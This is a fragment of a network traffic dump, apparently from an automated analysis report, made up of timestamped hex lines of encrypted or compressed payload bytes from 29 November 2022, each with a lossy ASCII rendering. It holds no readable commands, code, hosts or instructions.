                                  2022-11-29 15:55:23 UTC593INData Raw: b1 02 74 fb 89 0b 96 9a 4b fc c2 c1 27 6b 74 95 8a 8e a3 70 45 22 69 53 8e 07 72 70 d3 51 29 68 8e 0d 8b 0b 3a 75 58 57 64 f6 50 de a6 4a 6d ff 86 91 0d 28 55 35 b1 bd 42 dc 8b e2 46 e8 fc a7 0b 00 58 5d be 24 db 2e 52 be 67 32 36 a5 57 d9 4e f3 1d ed 9a 50 07 94 fe 6a ae ea aa 42 5d 0d d1 4b 24 0a 4e 34 1d bb 21 ba d3 79 f0 de 34 1e ff 84 3a ae 58 f1 15 b1 b2 88 ce ed 6c 1f 54 78 06 d7 e4 51 6d 67 88 c6 58 e2 6d 39 fa 02 cb a5 b9 db d5 21 b8 2a aa dc 75 63 f2 4b 60 10 ca 64 6b 91 41 d3 3b 1e 59 de 63 c4 fa 7f b1 f4 1a 8a 6b 5a ae 27 f9 73 40 7f 5a 82 3f fe 26 68 14 02 8b 58 f3 90 0d 04 54 e5 69 5c d5 f6 da 0f 99 b6 c9 4e 6c bf db e6 55 7d b0 4b 96 c3 fd 3b 04 d1 b0 25 5e bd bb fd e7 28 bc d3 f3 35 47 04 5b 34 ec 2a 3f c2 70 3c c9 1c 1c ff 28 ce f6 7e 51
                                  Data Ascii: tK'ktpE"iSrpQ)h:uXWdPJm(U5BFX]$.Rg26WNPjB]K$N4!y4:XlTxQmgXm9!*ucK`dkA;YckZ's@Z?&hXTi\NlU}K;%^(5G[4*?p<(~Q
                                  2022-11-29 15:55:23 UTC609INData Raw: 8a de 98 27 79 15 fd 00 3c 7e 37 08 2e 16 b0 ef d6 3a bf 9f 31 f9 f5 89 a7 cf b3 07 53 5d cd 40 79 31 7f ac 11 82 cd a8 05 2a ff 16 d8 8e e5 61 db 10 d6 30 5c 1c 7f e2 9f 5e d8 83 d4 8d f1 0e a2 c6 2d d6 e4 74 2c 48 b0 9f 8b 43 1f ed 20 c9 18 54 22 0a 56 c3 3c 03 e6 f3 f2 30 59 be 29 43 13 00 c4 18 03 ad c2 21 d4 e1 71 25 15 5a 22 8f 01 86 a1 f7 dc 75 c0 88 3b 4b 08 2c da 01 b0 a7 b9 20 f2 5e ad 77 01 85 22 95 d5 3b fe 1b dd 0e de f4 d3 d7 34 66 9f 30 b9 54 f5 91 1b 45 3b 11 48 ab 71 80 57 85 2c 3c d3 45 14 9b 3a 4f 8a 58 c0 3c 52 0f e7 14 48 f0 c5 40 ce f4 05 6d 2d 08 e8 85 96 df b3 99 ec 67 bc 1a b1 3f 57 38 74 0b f0 d9 74 86 1e 17 d3 89 69 f4 86 e9 f5 fe 0e 4b 98 ad 17 25 76 e0 f6 09 d7 42 d6 0c e9 cb 31 b9 2d d6 18 eb 42 fd 3f 4e 9e 15 a3 be 8a 50 1c
                                  Data Ascii: 'y<~7.:1S]@y1*a0\^-t,HC T"V<0Y)C!q%Z"u;K, ^w";4f0TE;HqW,<E:OX<RH@m-g?W8ttiK%vB1-B?NP
                                  2022-11-29 15:55:23 UTC625INData Raw: 45 5e 70 8d a6 80 ee bf d8 9c af 97 f0 45 88 a9 c0 b9 38 04 5d 69 19 ac 21 d8 0d c3 ee 40 4d 53 a5 ca b3 1b af 82 f9 dd 11 d0 ae a2 13 6a e9 3c d4 0c 95 73 85 b4 84 52 e1 73 c6 f2 88 55 ce 28 96 28 a0 5e 9f f0 ba 1a e0 e0 48 7e af d9 de be 46 ca 56 1a 49 d0 73 bf 92 3a db b2 70 af 29 75 8b 9e c7 db 91 56 8d 33 98 5a 3b c6 78 4e 10 cb 69 4a 64 01 c1 41 92 9f 70 bb e9 8e 04 83 76 94 0c 4e e6 72 2c ae b2 38 2c a9 f4 6a f8 ad e0 fb 82 40 58 52 7e c1 49 b5 82 31 01 24 c2 1c 75 ee 85 7b 7a 08 c1 9e cd a4 6a 6b d7 1e 4d 59 07 c2 f1 ed b1 10 6d bd a8 0e c6 ea 16 90 dd f7 0a 85 0a c3 7e 77 15 9f 66 fb 7f 10 d0 3b 62 72 13 11 d5 17 94 fd b3 5c 82 3b c0 ba b3 e6 99 2d 15 3b 3c 2f 65 8c 3c 96 0b c7 3c f0 7a 00 45 7e 18 41 11 b0 65 77 f6 e8 6c 71 37 54 40 cb 8e 45 0c
                                  Data Ascii: E^pE8]i!@MSj<sRsU((^H~FVIs:p)uV3Z;xNiJdApvNr,8,j@XR~I1$u{zjkMYm~wf;br\;-;</e<<zE~Aewlq7T@E
                                  2022-11-29 15:55:23 UTC641INData Raw: eb a8 24 3b 36 87 df fe da a0 be 92 19 27 7d 35 0d 95 de e6 53 7c 37 bd d4 d3 ab 13 bd 90 5f 65 19 44 88 64 22 4c 64 36 4e 2f 67 3a b7 98 7d 0a 2d eb c2 a8 60 78 e5 bc d1 7e 8b 3d d1 8b d6 12 08 49 56 63 fd 3b 64 bf 0b 82 cf 12 a7 27 54 72 82 f2 ca 17 74 ca 12 70 78 fc b6 7f 55 9a 79 fd 3b 1c 11 4c 92 a3 a1 04 eb 06 5f 40 5f d7 6d 36 bf f9 88 3e 22 67 89 48 e8 1a 8c a3 09 4c df 51 0b a8 63 56 87 75 f7 14 b8 75 73 24 9c 63 16 d4 c4 fe 79 a9 55 59 ea f0 d9 d1 5a 15 ef 6a a2 55 b0 07 4d 6a a1 da 07 cc 6a 93 96 98 3d 02 40 b5 0d 37 b1 8d 64 69 d1 d9 8d b6 9e 5f b8 85 07 f3 38 c2 04 9d 1b 6a de e9 1f b2 77 8d 1a f0 6b f0 4f 09 82 8f af 80 67 79 87 e6 55 27 bd f7 23 9c e4 ee c9 b2 f4 ae 51 9e cc fc 02 68 84 30 d7 bc c3 73 13 87 28 82 da c7 c9 43 7c 7b 01 73 3f
                                  Data Ascii: $;6'}5S|7_eDd"Ld6N/g:}-`x~=IVc;d'TrtpxUy;L_@_m6>"gHLQcVuus$cyUYZjUMjj=@7di_8jwkOgyU'#Qh0s(C|{s?
                                  2022-11-29 15:55:23 UTC657INData Raw: 0f c6 a1 5c ac e4 8c 1c 78 c0 c1 13 27 98 46 5b c7 1b 59 48 ec 71 ba a1 21 97 b9 11 f5 ec b6 e4 57 c7 b7 ef 48 6e 87 3d 9e b2 38 60 bf c0 f1 45 69 a0 9b a7 1b 97 28 c1 97 ed 02 a0 e6 7a 72 ce b0 e8 41 3e 58 b6 99 c8 c4 39 2f ed ef d5 8e a8 74 de 6a b0 bc 35 a1 f7 0c 8a 2d 18 b4 86 cc 84 18 71 2f 17 f0 c6 ab 13 9c fe a3 43 04 81 8a d7 9a 2b 87 03 75 0d 3c 4e 9f 4c 87 44 91 5d 7b 45 08 28 05 22 a3 c1 02 31 12 f0 74 4b 73 cc 0b a2 50 68 f1 57 88 5b b5 49 33 cc 2f 33 9e ae 0c a9 12 e0 b3 23 1a 0e 77 a6 1a 74 db d2 0b 53 bf 68 42 d6 21 c3 2e 56 aa 99 87 b0 e7 0b a5 eb 9a 85 11 10 af 27 4b da f1 2a c2 00 62 57 79 41 ca 99 9f 40 63 70 d2 85 b6 e5 38 a7 e2 52 9f fe 0c 18 9c 92 7a 8c aa 86 b6 a8 4f 14 d4 56 d6 c9 54 15 52 29 50 d5 70 05 79 f3 8a 47 85 fe e0 c2 64
                                  Data Ascii: \x'F[YHq!WHn=8`Ei(zrA>X9/tj5-q/C+u<NLD]{E("1tKsPhW[I3/3#wtShB!.V'K*bWyA@cp8RzOVTR)PpyGd
                                  2022-11-29 15:55:23 UTC673INData Raw: f2 24 dd d4 ed c6 48 df 2d a1 fd c5 65 a6 b6 89 c6 fa 3f 6c cd 7c a0 7f 6e 47 7f b6 68 da 84 25 ab de c9 24 1d 10 38 36 92 70 6a c3 66 64 fa b6 1d 9c c5 5a 73 5b 53 a9 fd 02 a3 a4 dc 83 24 34 93 07 27 93 90 e4 85 d4 b2 c8 17 a1 2f ef d5 6d 86 49 02 56 16 49 74 92 26 e5 1e 2a 6a 1e 6e 7c ea 29 2b e9 ea 30 4a 55 ff be cb a5 b1 73 37 76 e7 4f 88 9a 24 d0 85 fc a1 bd 5e 06 40 6f b2 11 b1 81 74 d3 6f 76 d4 3a ac 36 87 a3 b5 47 0b d8 b5 70 2c 8b 9d 51 22 58 68 13 fc 8d 59 cc 49 32 ae 0f b2 24 a1 b4 1d 86 71 92 e3 08 3b 58 27 85 27 e5 f7 27 ad 88 c5 4e 75 0f 1b cb 72 78 e3 b2 3d a0 0d b4 55 76 95 ed 81 de 9e d0 a0 46 4b 9c 23 4a f9 1f f9 76 5c de 5b 8a db ab 03 c7 d9 f2 a4 8f 1b aa 75 d2 64 88 4e 5b df aa 06 1c 94 b9 7b 47 de 94 49 e2 42 75 07 1d 00 6f 0d 43 dd
                                  Data Ascii: $H-e?l|nGh%$86pjfdZs[S$4'/mIVIt&*jn|)+0JUs7vO$^@otov:6Gp,Q"XhYI2$q;X'''Nurx=UvFK#Jv\[udN[{GIBuoC
                                  2022-11-29 15:55:23 UTC689INData Raw: 28 ca 36 27 39 e3 9a 4c 10 f8 f7 bb 72 ec 59 c2 2e cd fe ce be f0 e8 f9 ab 2f 45 86 09 6f f8 bf 28 b0 ab af 7a e3 3b 81 35 9a ea 4a 41 be 24 f1 25 f3 65 cf 01 10 15 b9 37 41 0e f3 48 db 8d d2 2c fc 9f ff 2e b1 1f a2 56 7c 09 d5 08 d7 16 2d a2 a1 72 34 b9 23 11 8c a5 c3 10 fe 10 e8 87 ff 71 e0 e5 ab f3 90 58 18 d0 af 09 b6 83 1d 8e 42 8d c7 c2 69 e1 97 24 0d ab 93 c5 0a 33 ad b5 64 ea b5 28 9f bd 17 86 ed 55 06 ee 4f 8b 9d 40 23 59 63 44 4c 13 17 21 d7 b8 bb 6a 2c d7 73 5d bd f4 aa 9c d8 61 87 cc 30 22 ca 49 c9 a4 ef f0 81 52 b7 48 32 6e 56 d3 d5 47 75 b7 da 95 d8 86 31 62 28 1e ad 6e 9b 58 59 1e cf 99 5d d1 89 93 71 d2 eb 02 14 bc a9 b2 09 b9 a9 1e 19 d3 73 8f c9 96 b2 95 ee ab 1c 16 1b e2 08 0e 31 c7 8e 91 15 e9 34 47 2a c4 f7 cb 88 fa b2 18 58 93 06 0f
                                  Data Ascii: (6'9LrY./Eo(z;5JA$%e7AH,.V|-r4#qXBi$3d(UO@#YcDL!j,s]a0"IRH2nVGu1b(nXY]qs14G*X
                                  2022-11-29 15:55:23 UTC705INData Raw: 15 87 50 9e 4e 94 07 f9 48 34 1b f7 7c 0a 50 8c c5 bb ca 18 74 b0 7e c0 cb 92 a0 2d 76 54 75 22 aa df 91 45 16 30 1d 55 94 3c e1 06 18 c6 51 44 0b fb b2 76 ea 50 bc f5 f8 96 35 40 61 63 f8 20 ff 11 a6 81 3c a8 ad b7 9c bb 71 30 87 24 a7 16 92 2f 82 73 eb db 9e 6e 0f ba ac 06 44 25 17 3d 9a d9 35 7f d6 c3 f7 5c 09 88 b5 0b 48 e2 2a 51 45 ba 30 d8 9e df be 81 9f fa 03 eb f1 07 78 0b 81 b0 9e 17 08 e1 37 5b f3 a6 79 11 9c fa c9 e0 46 20 95 c2 a1 dc ce f6 00 9b 5c 2d 59 d6 45 ee 1a af 08 ba 7f b6 7c b7 49 50 d6 42 53 53 24 d0 01 a7 02 c1 99 c9 e3 7d 17 69 30 e8 a2 d7 76 c2 5b 79 0f 4b fd 36 11 ff af b5 67 92 23 f9 5c 79 d3 ae b3 71 82 65 75 3e e5 27 a6 fe 8b 0d ed f0 0d cb 59 6c 45 66 df e7 a4 d5 21 97 d6 21 da 66 1b fa be cd d2 61 cd 73 e7 71 85 ba 2e 70 c1
                                  Data Ascii: PNH4|Pt~-vTu"E0U<QDvP5@ac <q0$/snD%=5\H*QE0x7[yF \-YE|IPBSS$}i0v[yK6g#\yqeu>'YlEf!!fasq.p
                                  2022-11-29 15:55:23 UTC721INData Raw: 7c 07 9c 2e 73 b7 ca af 70 0e 3e 83 ba 27 ed 4d 63 71 aa 38 21 59 3a 9a ed 5f e9 be e9 3e 48 87 9c 7d 97 3a 93 6d 05 57 36 89 c8 d7 aa f5 21 08 21 c1 98 67 f9 e5 df 88 84 0b 96 24 08 4e 06 bc 2d f5 c9 63 64 af 25 24 45 14 79 de 95 3c aa 4b 33 83 d9 78 ec d0 0c c8 8a de c0 ed 71 c9 19 b1 68 ac d8 a7 b8 88 1d ce 72 f0 dc 52 21 67 e9 ee ab a4 8c 3e 5e 49 49 1f fd 9c e9 5c 90 40 20 e2 19 29 cd 17 30 d5 22 01 13 5c 61 06 89 e5 54 5e 87 87 d9 c8 b1 54 fb 1d d2 7f 8f 65 7c d4 e3 29 ec 84 28 cb 98 c2 24 4c 40 9b f2 72 51 80 cc 0c 31 8c 05 81 b1 79 46 c6 93 f4 aa ea ad 71 bf 1d c0 d9 e0 43 d8 2e d1 6e 65 6f 3d 17 18 ac 6c 78 3d b8 cc 1c 8e e9 0c e0 52 b7 46 76 04 b8 55 df 68 dd 25 7d f7 5b c3 da cd b2 2f 15 4a 2a fe c4 b9 a4 ce 8b ba 6c e3 10 51 58 48 fd 17 f7 81
                                  Data Ascii: |.sp>'Mcq8!Y:_>H}:mW6!!g$N-cd%$Ey<K3xqhrR!g>^II\@ )0"\aT^Te|)($L@rQ1yFqC.neo=lx=RFvUh%}[/J*lQXH
                                  2022-11-29 15:55:23 UTC737INData Raw: 6e a6 ca 89 21 13 10 b4 e8 7f 7f a3 6d 25 32 8e 98 93 53 29 73 d6 d3 75 06 07 d4 6b ae 43 98 0d ce dd 7c f5 03 e6 75 92 ed 51 67 1a 40 47 c0 b2 48 9b e9 78 bd 82 c5 7c de 66 f9 09 bc 0d fd 07 6c 77 f0 57 e3 78 2b 1e 1a 7a c9 15 87 da c7 51 53 42 90 6f 62 08 26 12 9d 1e 25 f0 84 d5 fc ed 44 d3 21 92 84 03 0c f6 75 91 f9 f1 b4 e8 c8 e0 15 77 e4 b4 a2 c5 61 13 07 5f 27 32 8d 01 92 36 d6 8c 60 25 23 16 52 1e 30 16 7d 47 62 ed 4a 05 ad 77 9e 02 76 ea a8 a0 5f ff e2 3c 02 a2 72 77 75 63 62 fe d8 ca 07 2f 5a 4d 3f c6 8c c4 9b fd 0e 59 75 b7 2f de 88 99 b3 9a a9 3f 59 b3 a3 8c 67 a4 95 c9 cd f6 e8 db 97 ea 03 91 52 1a d3 c5 be 53 64 7a 2b 67 c6 05 a0 37 20 b7 b2 69 4f df 02 e6 e9 64 0f 8d a1 80 2e 2d 42 bd 5d 97 9a 64 45 39 ed 7e 8c 22 b3 61 e5 db 09 07 24 86 d1
                                  Data Ascii: n!m%2S)sukC|uQg@GHx|flwWx+zQSBob&%D!uwa_'26`%#R0}GbJwv_<rwucb/ZM?Yu/?YgRSdz+g7 iOd.-B]dE9~"a$
                                  2022-11-29 15:55:23 UTC753INData Raw: c5 38 df fa 00 ce d6 73 f7 1f 03 47 76 52 94 16 13 5a 40 4a 2b b1 e1 b6 e1 b5 d0 c7 7f 92 86 69 27 73 07 34 a0 52 e0 09 f1 c9 04 ce 97 39 01 34 1f a7 4d e1 6f ca c0 f5 ff f1 7a 21 98 e2 07 7e 7f 41 62 59 0a 6b e4 b1 c8 7e 5b 22 42 40 5d 6c 9a a5 41 e4 ea dc a1 a9 99 1c 6d 54 69 37 5e 5f fa 8f 1b 88 81 81 71 78 85 54 5c 43 a1 8c f2 46 29 de 36 35 a0 71 80 57 3f 05 c9 ea 1a 5e b8 9f 99 d1 b0 46 b4 c4 0c c4 6c 4f f6 8f f5 87 92 0c a1 a1 75 4a 7d 53 16 d8 f6 b6 2a 14 4a 0f 52 a5 65 70 30 8f d2 aa 97 98 38 23 5d 57 a0 80 01 c1 0b 12 12 35 f5 0e 26 4e d4 92 e2 52 67 a0 6b e1 15 b4 88 99 20 71 c8 21 12 5d 4b e0 b2 70 86 2d cc b3 cd a0 dd 0c 0d c9 62 10 aa 27 af 0f d8 a9 67 30 b8 be 57 71 19 2b 59 d5 e7 e6 c3 aa 0e 51 55 95 df c0 06 a7 51 2b 8e 05 fc e3 f9 ac 16
                                  Data Ascii: 8sGvRZ@J+i's4R94Moz!~AbYk~["B@]lAmTi7^_qxT\CF)65qW?^FlOuJ}S*JRep08#]W5&NRgk q!]Kp-b'g0Wq+YQUQ+
                                  2022-11-29 15:55:23 UTC769INData Raw: 1e fa e9 0f f5 c7 d0 f3 09 a9 71 3a 37 f0 47 8c 1e 14 18 ba b0 51 b9 ca d3 88 0f c4 5c 86 11 9b cd f8 17 3a fb ea d1 e8 e6 60 20 df fc fb b4 af 6c 13 9a ee e7 65 7a 7d e0 b2 ce df 0d 15 f6 35 eb 02 33 c3 dd a7 a4 c4 b5 bb 98 82 e1 11 2b 18 be 76 5f bb 3c 50 10 9d ef 12 01 1a a6 9b eb 67 da 44 9f 9b d4 c6 b6 27 7a 37 2b be 52 94 ec d7 4f fa 9a 52 7b b7 db a7 b2 7c 27 49 ac a6 bc 79 13 c8 7f 2b 06 9a 66 02 95 1d a7 60 5d d4 77 fb ef c5 32 6b e6 49 c1 13 e2 1f a6 5a 97 20 f3 3b 7b 72 95 3e 02 ca fa fa 6a b1 b8 b6 a2 9a 24 ea 1a d5 93 d4 e5 83 f9 8b 98 94 1e 4f b8 45 c4 65 10 d3 10 05 70 5a 64 e9 dd 8d aa b3 74 2d 95 02 0a cf bb bf 94 73 aa cf 29 7e 49 2a 59 ed a5 5a 6f da fd fc 5a 1f 8e 5e 5e e3 8b 1c 28 94 35 a4 35 51 7d 77 bb 37 46 25 f2 c4 cf b4 31 e7 ac
                                  Data Ascii: q:7GQ\:` lez}53+v_<PgD'z7+ROR{|'Iy+f`]w2kIZ ;{r>j$OEepZdt-s)~I*YZoZ^^(55Q}w7F%1
                                  2022-11-29 15:55:23 UTC785INData Raw: 86 e4 8e 6a 9c 40 54 b3 cb fa 4a 9b 09 8f 29 29 d5 31 38 89 cd d0 37 50 e3 f8 ee 0b 18 97 75 47 8c 99 f9 47 d4 21 48 b5 38 69 fd c8 2a 9e ff 09 f8 6c fb cf 60 e4 d2 0c 2a 5f 00 cc 8d 71 32 f8 60 3f aa 88 bd 17 91 a3 3a 25 13 a4 77 ff 6c 2f 1a 07 c0 52 00 c5 77 e6 70 53 ed 8d ca 0c 00 a6 de df 2f 34 09 17 47 4b 13 b2 92 51 6b 48 e7 e0 2c 1b 2f 52 b8 a6 be 62 95 58 54 22 10 2b c4 c5 d1 b1 d1 1b b6 37 4b aa ca 29 b5 9d ce dd f7 fc 31 ca 77 8d 64 2f 6b 35 b9 1b 68 40 a3 33 f4 85 51 f7 f4 d6 af dd 82 f9 23 02 97 3c 92 02 06 e8 67 09 d4 69 df 40 16 b0 d9 cc a7 a7 b3 48 1f 6f f8 41 15 aa d0 ce bd 2c 4d 9b 4a 50 08 b2 56 80 a9 6d f5 91 6b bc ad 07 5a 66 94 01 ba fb b7 c3 a6 3f 0e 27 9e 13 9a b3 61 23 54 37 4a bf 6b ba 99 5e 98 c5 19 4a 17 c1 0b 4b 40 2f 26 10 2d
                                  Data Ascii: j@TJ))187PuGG!H8i*l`*_q2`?:%wl/RwpS/4GKQkH,/RbXT"+7K)1wd/k5h@3Q#<gi@HoA,MJPVmkZf?'a#T7Jk^JK@/&-
                                  2022-11-29 15:55:23 UTC801INData Raw: ad 3d 63 87 cb f0 80 30 65 30 71 ac ea 3d fd 7b ad be 59 e7 03 cf 29 d9 8c 2d ff d3 01 01 d8 98 55 fe de cd 8a 7b 0e 36 c3 20 eb d1 48 3d 91 ff cd 7a 9e 29 41 70 fa 9f 38 59 b6 4f 9c eb d1 ae 7f be 97 6b 8d e3 28 2f 94 80 f7 16 c7 53 ee 13 34 c3 da 9d 8e 0e 1a ee e8 8f a3 bd 2f f7 d4 02 a5 ea 7c d8 5d 6e dd 42 8d f7 4a 82 00 d1 c0 4f 15 af a6 92 8e 4d dd b0 f7 e2 f7 a2 09 49 0c a5 81 53 0f cc b9 8c be bb 71 c3 bb f7 14 9c ae 59 b1 db 86 a7 60 63 d3 b9 38 a7 79 f6 6b 9e 40 39 c9 d4 74 ab a0 e8 9b 0a 10 1a 90 b6 ac f2 43 ec 41 53 83 87 da 6f b7 44 37 39 bb b9 4b 46 8c da b8 ea 09 48 9a ea d2 20 a8 62 95 94 55 3f 50 e2 7d b3 38 0f cc d5 3f fc 16 ed dc e9 12 1b 4c f5 e6 8d aa 47 58 40 7c fc 68 97 83 14 70 28 75 24 fa 26 c5 63 f1 23 85 20 2c 22 29 0b c1 f3 f0
                                  Data Ascii: =c0e0q={Y)-U{6 H=z)Ap8YOk(/S4/|]nBJOMISqY`c8yk@9tCASoD79KFH bU?P}8?LGX@|hp(u$&c# ,")
                                  2022-11-29 15:55:23 UTC817INData Raw: a9 8c 8c fc 00 d3 55 d5 4a a0 b9 22 b8 10 81 74 cd b5 33 4d 08 7b d2 71 f3 2d fd d6 68 ef e3 9e 48 ea 43 d3 a0 b5 73 d7 eb 1d 52 be 68 67 89 04 cc 23 ec f2 34 11 2d 31 bb 15 c6 99 50 c7 f7 aa af bb 4a 8e 70 f7 68 6a 67 79 56 d2 ad c4 1c df b4 c6 d1 8c 63 9f 32 67 71 1a 6c 0d ca 31 2e ea ca 9a 2e e3 be ff 9c ad 74 20 2b 51 24 c6 5e 66 c6 81 ab 55 4c 9c da 10 8a 84 98 1f 21 01 93 52 28 50 97 09 56 aa 4e 92 67 ee 6f bf 82 32 d6 35 9a 47 34 1d 8a f2 cb 59 97 d9 fc 39 d0 da 4a aa 2a ed 0a 92 76 7d 27 0c b8 4e 8e 75 2b 2e 76 a9 5c 82 8a e5 42 57 e4 61 c6 cb 10 bd f3 01 d6 58 00 94 ba 23 1f 52 fa 2c 0f 85 06 4c 84 4e 59 a9 ef 09 da ca 5f 6e 2e c2 be a9 54 eb 00 aa 62 8d 24 0b 8c 4f 84 83 0c 16 cb 46 10 b1 08 5f 4e 64 f3 23 80 d2 82 4d 6a f3 50 c3 82 64 6d 70 d1
                                  Data Ascii: UJ"t3M{q-hHCsRhg#4-1PJphjgyVc2gql1..t +Q$^fUL!R(PVNgo25G4Y9J*v}'Nu+.v\BWaX#R,LNY_n.Tb$OF_Nd#MjPdmp
                                  2022-11-29 15:55:23 UTC833INData Raw: 5e c7 a4 29 d4 54 b4 63 12 b6 41 3c f2 50 d3 eb 20 cc 55 ea 8e 3b 9a 90 ab db 68 1e a5 88 da 70 e2 34 c0 13 22 1d 1d e0 4a 1f 9c 9d 5b 6b dc f5 7e a4 e5 bc 98 cb 7a f8 60 e5 56 1e 2c ea 84 d3 66 91 27 d7 3a 87 ea ba f4 cb 73 94 5e 7f 60 ab 59 0c 83 ea 9d 81 34 ff b5 c4 6f 11 ae a4 4d a0 3c c7 02 c2 3e 1a 49 01 8d 50 16 80 40 cb a9 d0 1d eb b4 8b 52 ae 3b ab d9 87 13 55 ff 64 3f 16 ac 08 7f f2 92 9a 93 7a 2d 61 c0 9e 5b 3c c9 9c f2 71 35 dd e1 ab b7 4e 4e 1d 19 b0 02 76 50 64 62 c5 25 84 91 74 95 30 93 94 e2 bc c3 d2 45 57 15 fe 78 fc cd 5c 3b 7a 1c 63 b6 77 90 e9 71 3c 26 ca e8 99 0c 34 d4 91 25 36 72 55 ed 23 fe 18 0f 7f d1 f1 81 9c 3d fa 07 06 23 3a 86 09 a4 43 0c 35 f2 9d 6f c0 20 13 64 f8 d4 c3 dd 98 48 94 3c ad 2c ad 9b 23 03 5a d1 f5 ce 49 71 bc 11
                                  Data Ascii: ^)TcA<P U;hp4"J[k~z`V,f':s^`Y4oM<>IP@R;Ud?z-a[<q5NNvPdb%t0EWx\;zcwq<&4%6rU#=#:C5o dH<,#ZIq
                                  2022-11-29 15:55:23 UTC849INData Raw: 7b a4 1f 13 a3 1e 49 cc 3c 33 a7 71 c7 eb 39 83 72 fb ac 88 fa a7 47 d6 61 85 57 08 31 8e d0 94 4c d0 f9 d6 fb fe 0d 77 33 5e cb e1 13 2c 80 d1 c8 aa 9d 19 32 f7 3a 7d 18 87 7d 4a f6 8d 1a bb f6 82 a6 ad 0a 4f 91 3d 67 1d b3 57 46 14 1d ef ca 75 c7 fe 41 34 a9 1f ec 7a 7e 4d 8b 93 8b f1 7f d9 63 04 cd 0b 0a 57 4b 61 6e 23 eb 9a cb dd d3 6d ed 33 3f cc 55 db 82 da dd 65 39 ea 47 2c 12 f2 69 f6 43 06 06 2a 00 c7 8e f6 cd 4d 86 2e 7d 51 18 f6 c0 5a 3a 92 61 72 03 3d 2a 1d b7 5c 00 8b 9a 88 26 26 11 b3 3b 2a fe 6a 70 54 ad ea 04 f6 e1 e8 7d e3 62 80 d2 22 6e ff 03 e0 f1 89 8b d0 fe 30 fd e5 54 20 7b ea 72 85 28 bc 12 75 50 45 f7 a5 a7 86 e3 04 f6 56 96 30 97 a3 c6 ba 16 e1 39 95 3e b8 a0 ed c4 9d 02 09 ac 46 28 10 93 68 fb 52 a0 50 26 bc 04 76 01 68 20 64 f0
                                  Data Ascii: {I<3q9rGaW1Lw3^,2:}}JO=gWFuA4z~McWKan#m3?Ue9G,iC*M.}QZ:ar=*\&&;*jpT}b"n0T {r(uPEV09>F(hRP&vh d
                                  2022-11-29 15:55:23 UTC865INData Raw: 56 1a 33 b1 59 b1 0e 6b 43 83 29 b8 4e 9f a7 e7 02 87 0b 21 b7 de 83 f0 a8 29 6b 34 a6 96 16 11 c5 a9 1a 2c ef c2 8e 56 15 5c 8d e3 6b 64 be d7 0a dd 61 3c ab a0 0f ff c4 7c 39 d4 b6 2f 11 65 fe dc fd a7 bb 61 8e ce 4d 18 30 3d 71 32 df 3e a6 af c8 c6 fb 75 58 d1 6f 19 fd 3a 71 b7 00 00 b5 dd 31 72 23 6b 8c cb 28 f7 74 61 74 c6 ca a2 cf 70 23 18 51 90 e0 a5 d6 0a ff 63 57 c1 30 ea de 2e 1b 47 b9 ca f1 1c 7e b0 3d 70 b4 ed ea 10 31 ab 40 98 d0 62 a5 98 ca 7c e1 1b fb e3 b1 19 f9 c1 54 ef 7f cb ab 38 72 d9 21 35 c2 de 77 75 01 f7 e9 6f 34 8f 34 58 75 3c d8 ed e1 fb 5f 71 9f ce f0 b9 6f 6b 18 8c 3e 74 64 72 0a 16 1c c4 0a f7 4d 31 3b 39 5f e5 03 b9 c8 f4 a2 b6 20 71 42 95 c1 96 e1 85 a0 93 cd a9 af 65 5d 74 fa f7 b9 02 8f 96 53 af 49 6e e9 f1 27 15 f5 e5 49
                                  Data Ascii: V3YkC)N!)k4,V\kda<|9/eaM0=q2>uXo:q1r#k(tatp#QcW0.G~=p1@b|T8r!5wuo44Xu<_qok>tdrM1;9_ qBe]tSIn'I
                                  2022-11-29 15:55:23 UTC881INData Raw: d6 59 b4 27 45 f2 ac 3f 4a 17 36 f3 83 20 a8 7c bb c7 56 a9 8f 03 9e 54 5d 9a 92 85 44 85 84 4c e9 6a 7d be db 09 46 25 3c 15 9b 95 c8 e3 51 c5 76 88 c6 ab ce d4 10 e1 b9 40 51 8a c7 d7 b4 a8 5e f1 fe 8f d9 e4 91 5d 1b 31 c6 5a aa e2 9c 97 f6 38 34 06 cc 51 1b 0e bc 3e 08 d4 b7 ae ab 0f bc 57 7f 66 e9 ad eb a3 5b 93 2d 1f cb 25 0b 60 84 41 db 77 1c cf 25 0d cd aa e5 80 7e 3e 9f b4 4f e0 68 23 70 b4 3f 73 f4 6a 5c d4 cd 6f 84 84 00 4c 64 dd 8f f6 e5 9b eb a0 5d e7 c8 d1 73 3d 95 9c e7 8a dd bd 16 2d 92 83 fd 0a 43 9b b3 23 b4 42 5e c6 d0 36 71 09 58 dc 90 19 0f 9c 81 35 45 23 fe 58 59 7a 5c 0b 31 61 71 da 55 d8 84 19 94 25 72 02 b7 a1 d4 94 c7 2d 85 ec db 37 be db b1 95 f4 6a cd f5 8a ad 91 54 79 ea 1b 6c 96 56 fa 8b af 57 ad 1d d8 02 28 21 c7 34 d2 c7 ea
                                  Data Ascii: Y'E?J6 |VT]DLj}F%<Qv@Q^]1Z84Q>Wf[-%`Aw%~>Oh#p?sj\oLd]s=-C#B^6qX5E#XYz\1aqU%r-7jTylVW(!4
                                  2022-11-29 15:55:23 UTC897INData Raw: 8a 51 1c 5d 42 66 b0 1f 5d 2a 62 e3 43 c3 e9 b8 e4 8f 74 3b 71 20 b9 f2 2d 5d ff 75 0c ae d2 9e e8 76 4a 91 17 78 95 c7 8f ee 3a 41 4f 01 92 c0 01 85 8c 6a 58 36 2e 41 b9 93 86 11 4c ad ed f0 c6 de b8 01 c2 7d e4 67 87 26 36 ad c7 a8 44 01 d9 08 ea ec 0d c5 9d 63 11 d5 c1 4e 45 b4 d8 53 0d 94 87 5e 8f 32 9f 3b a3 b7 76 e5 94 9f 9a c3 ab b6 ea b6 9f d0 50 43 aa 13 ab b5 af 6d db 3a aa 43 0e 02 5c e1 29 e3 70 d4 34 9f ca f8 33 36 d6 28 5f 16 0a 4f 42 63 e4 d3 e5 3b 62 aa 6c b2 a8 35 96 ce 2f c9 f9 fa 35 3e 40 fd ef ef 2e 1e 3c ec c9 80 6d c5 cc 82 2a cb 0d 7d 7e 09 de 14 e2 29 c2 65 05 65 10 f6 90 94 bb cd 8a 11 cd 23 dd 62 52 e5 9f 01 7e 9e b4 23 2c 0d a5 5c 36 e5 d4 bb 2f c8 37 d7 69 ab 58 04 42 03 47 52 cc 49 d5 a9 29 17 54 24 ef e6 40 e6 28 18 97 ad d9
                                  Data Ascii: Q]Bf]*bCt;q -]uvJx:AOjX6.AL}g&6DcNES^2;vPCm:C\)p436(_OBc;bl5/5>@.<m*}~)ee#bR~#,\6/7iXBGRI)T$@(
